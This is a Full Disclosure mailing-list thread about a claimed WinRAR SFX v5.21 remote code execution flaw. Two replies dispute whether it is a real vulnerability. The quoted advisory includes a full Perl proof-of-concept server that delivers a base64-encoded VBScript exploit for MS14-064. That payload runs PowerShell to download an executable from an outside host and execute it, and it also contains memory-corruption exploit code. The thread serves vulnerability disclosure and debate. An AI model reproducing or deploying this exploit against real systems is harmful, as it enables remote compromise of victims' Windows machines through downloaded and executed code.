Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability

[Hernan Moller <hernan () nivel4 com>]

In fact, a SXF file type can only try to access a specific URL
(server's attacker). Then the attacker exploits a
Microsoft's vulnerability (ms14-064).

The WinRAR file doesn't allow RCE by itself.


--
Hernán Möller
http://nivel4.com


2015-09-28 5:39 GMT-03:00 Gynvael Coldwind <gynvael () coldwind pl>:

> Correct me if I'm wrong, but the vulnerability can be summarized as: if you
> run an untrusted .exe you might execute malicious code?
>
> I hardly see this as giving anything new to the attacker who can just
> create a malicious exe file, set the winrar sfx icon and send it to the
> victim.
>
> Keep in mind that not every unexpected behavior or software bug is a
> security vulnerability.
>
> (and no, potential AV bypass doesn't make it a vulnerability either)
>
> Cheers,
> Gynvael
>
> On Mon, 28 Sep 2015 10:27 Vulnerability Lab <
> research () vulnerability-lab com>
> wrote:
>
> > Document Title:
> > ===============
> > WinRAR SFX v5.21 - Remote Code Execution Vulnerability
> >
> >
> > References (Source):
> > ====================
> > http://www.vulnerability-lab.com/get_content.php?id=1608
> >
> > Video: https://www.youtube.com/watch?v=fo0l0oT4468
> >
> >
> > Release Date:
> > =============
> > 2015-09-28
> >
> >
> > Vulnerability Laboratory ID (VL-ID):
> > ====================================
> > 1608
> >
> >
> > Common Vulnerability Scoring System:
> > ====================================
> > 9
> >
> >
> > Product & Service Introduction:
> > ===============================
> > WinRAR with over 500 million users worldwide by far the most popular
> > compression program and therefore the best way to files securely and
> > efficiently to pack for a data transfer to speed up the data transfer via
> > e-mail and secure storage optimized files.
> >
> > (Copy of the Homepage: http://www.win-rar.com/start.html )
> >
> >
> > Abstract Advisory Information:
> > ==============================
> > An independent vulnerability laboratory researcher discovered a code
> > execution vulnerability in the official WInRAR SFX v5.21 software.
> >
> >
> > Vulnerability Disclosure Timeline:
> > ==================================
> > 2015-09-28:     Public Disclosure (Vulnerability Laboratory)
> >
> >
> > Discovery Status:
> > =================
> > Published
> >
> >
> > Exploitation Technique:
> > =======================
> > Remote
> >
> >
> > Severity Level:
> > ===============
> > Critical
> >
> >
> > Technical Details & Description:
> > ================================
> > A remote code execution vulnerability has been discovered in the official
> > WInRAR SFX v5.21 software.
> > The vulnerability allows remote attackers to unauthorized execute system
> > specific code to comrpomise a target system.
> >
> > The issue is located in the `Text and Icon` function of the `Text to
> > display in SFX window` module. Remote attackers are
> > able to generate own compressed archives with maliciuous payloads to
> > execute system specific codes for compromise. The attackers
> > saved in the sfx archive input the malicious generated html code. Thus
> > results in a system specific code execution when a target
> > user or system is processing to open the comprossed archive.
> >
> > The security risk of the code execution vulnerability is estimated as
> > critical with a cvss (common vulnerability scoring system) count of 9.2.
> > Exploitation of the code execution vulnerability requires low user
> > interaction (open file) without privilege system or restricted user
> > accounts.
> > Successful exploitation of the remote code execution vulnerability in the
> > WinRAR SFX software results in system, network or device compromise.
> >
> >
> > Proof of Concept (PoC):
> > =======================
> > The code execution vulnerability can be exploited by remote attackers
> > without privilege system user account or user interaction.
> > For security demonstration or to reproduce the vulnerability follow the
> > provided information and steps below to continue.
> >
> > Manual steps to reproduce the vulnerability ...
> > 1.      Run perl code : perl poc.pl
> > 2.      Right Click on any file and select "add to archive..."
> > 3.      Select "Create SFX archive"
> > 4.      Go to the Advanced Menu and select "SFX options..."
> > 5.      Go to the "Text and icon" Menu
> > 6.      Copy this perl output (HTML) and past on "Text to display in SFX
> > window"
> > 7.      Click OK -- OK
> > 8.      Your SFX file Created
> > 9.      Just open sfx file
> > 10.     Your Link Download/Execute on your target
> > 11.     Successful reproduce of the code execution vulnerability!
> >
> >
> > PoC: Exploit Code
> > #!/usr/bin/perl
> > # Title : WinRaR SFX - Remote Code Execution
> > # Affected Versions: All Version
> > # Tested on Windows 7 / Server 2008
> > #
> > # Author: Mohammad Reza Espargham
> > # Linkedin: https://ir.linkedin.com/in/rezasp
> > # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
> > # Website: www.reza.es
> > # Twitter: https://twitter.com/rezesp
> > # FaceBook: https://www.facebook.com/reza.espargham
> > #
> > # ID: MS14-064
> >
> > use strict;
> > use warnings;
> > use IO::Socket;
> > use MIME::Base64 qw( decode_base64 );
> > use Socket 'inet_ntoa';
> > use Sys::Hostname 'hostname';
> >
> > print "    Mohammad Reza Espargham\n\n";
> > my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
> >
> > my $port = 80;
> >
> > print "Winrar HTML Code\n".'<html><head><title>poc</title><META
> > http-equiv="refresh" content="0;URL=http://&apos; . $ip .
> > '"></head></html>'."\n\n" if($port==80);
> > print "Winrar HTML Code\n".'<html><head><title>poc</title><META
> > http-equiv="refresh" content="0;URL=http://&apos; . $ip . ':' . $port .
> > '"></head></html>'."\n\n" if($port!=80);
> >
> > my $server = new IO::Socket::INET(  Proto => 'tcp',
> > LocalPort => $port,
> > Listen => SOMAXCONN,
> > ReuseAddr => 1)
> > or die "Unable to create server socket";
> >
> > # Server loop
> > while(my $client = $server->accept())
> > {
> >     my $client_info;
> >     while(<$client>)
> >     {
> >         last if /^\r\n$/;
> >         $client_info .= $_;
> >     }
> >     incoming($client, $client_info);
> > }
> >
> > sub incoming
> > {
> >     print "\n=== Incoming Request:\n";
> >     my $client = shift;
> >     print $client &buildResponse($client, shift);
> >     close($client);
> > }
> >
> > sub buildResponse
> > {
> >     my $client = shift;
> >     my $client_info = shift;
> >
> >     my
> $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVt
> >
> dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJT
> >
> Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNo
> >
> ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhw
> >
> cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgn
> >
> aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUn
> >
> LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4
> >
> ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwg
> >
> Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3Jp
> >
> cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFi
> >
> KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAg
> >
> aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdp
> >
> bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZp
> >
> Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAg
> >
> IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAg
> >
> IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5m
> >
> bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAg
> >
> ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVh
> >
> dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZj
> >
> aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAg
> >
> IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAK
> >
> ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4g
> >
> SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVs
> >
> bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3Rz
> >
> YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJl
> >
> Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAg
> >
> IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u
> >
> IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQog
> >
> IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1U
> >
> cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3Vi
> >
> IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1l
> >
> IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShh
> >
> MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3
> >
> NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0
> >
> NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEo
> >
> YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24g
> >
> RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1y
> >
> dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQK
> >
> ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAg
> >
> ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAg
> >
> ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICBy
> >
> ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShp
> >
> KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAg
> >
> ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAg
> >
> cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBS
> >
> ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBh
> >
> MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFBy
> >
> ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJl
> >
> c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2
> >
> Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3Qo
> >
> YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAg
> >
> ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlw
> >
> ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4K
> >
> ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAg
> >
> ICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAgICAK
> >
> ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAg
> >
> IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVs
> >
> c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQg
> >
> IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlm
> >
> KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVj
> >
> dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUo
> >
> YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBl
> >
> bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAg
> >
> IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAg
> >
> CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRy
> >
> dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBh
> >
> YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRk
> >
> KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAK
> >
> ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1
> >
> OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFi
> >
> KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+
> >     CiAKPC9ib2R5Pgo8L2h0bWw+";
> >     $poc = decode_base64($poc);
> >
> >     my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n
> >     $poc";
> >     return $r;
> > }
> >
> >
> > Security Risk:
> > ==============
> > The security risk of the code execution vulnerability in the winrar sfx
> > software is estimated as high. (CVSS 7.4)
> >
> >
> > Credits & Authors:
> > ==================
> > Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (me () reza es
> > or reza.espargham () gmail com] (www.reza.es)
> >
> >
> > Disclaimer & Information:
> > =========================
> > The information provided in this advisory is provided as it is without
> any
> > warranty. Vulnerability Lab disclaims all warranties, either expressed
> > or implied, including the warranties of merchantability and capability
> for
> > a particular purpose. Vulnerability-Lab or its suppliers are not liable
> > in any case of damage, including direct, indirect, incidental,
> > consequential loss of business profits or special damages, even if
> > Vulnerability-Lab
> > or its suppliers have been advised of the possibility of such damages.
> > Some states do not allow the exclusion or limitation of liability for
> > consequential or incidental damages so the foregoing limitation may not
> > apply. We do not approve or encourage anybody to break any vendor
> licenses,
> > policies, deface websites, hack into databases or trade with fraud/stolen
> > material.
> >
> > Domains:    www.vulnerability-lab.com           - www.vuln-lab.com
> >                               - www.evolution-sec.com
> > Contact:    admin () vulnerability-lab com         -
> > research () vulnerability-lab com                        -
> > admin () evolution-sec com
> > Section:    magazine.vulnerability-db.com       -
> > vulnerability-lab.com/contact.php                     -
> > evolution-sec.com/contact
> > Social:     twitter.com/#!/vuln_lab             -
> > facebook.com/VulnerabilityLab                         -
> > youtube.com/user/vulnerability0lab
> > Feeds:      vulnerability-lab.com/rss/rss.php   -
> > vulnerability-lab.com/rss/rss_upcoming.php            -
> > vulnerability-lab.com/rss/rss_news.php
> > Programs:   vulnerability-lab.com/submit.php    -
> > vulnerability-lab.com/list-of-bug-bounty-programs.php -
> > vulnerability-lab.com/register/
> >
> > Any modified copy or reproduction, including partially usages, of this
> > file requires authorization from Vulnerability Laboratory. Permission to
> > electronically redistribute this alert in its unmodified form is granted.
> > All other rights, including the use of other media, are reserved by
> > Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
> > advisories, source code, videos and other information on this website
> > is trademark of vulnerability-lab team & the specific authors or
> managers.
> > To record, list (feed), modify, use or edit our material contact
> > (admin () vulnerability-lab com or research () vulnerability-lab com) to get a
> > permission.
> >
> >                                 Copyright © 2015 | Vulnerability
> > Laboratory - [Evolution Security GmbH]™
> >
> >
> >
> > --
> > VULNERABILITY LABORATORY - RESEARCH TEAM
> > SERVICE: www.vulnerability-lab.com
> > CONTACT: research () vulnerability-lab com
> > PGP KEY:
> http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: http://seclists.org/fulldisclosure/
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/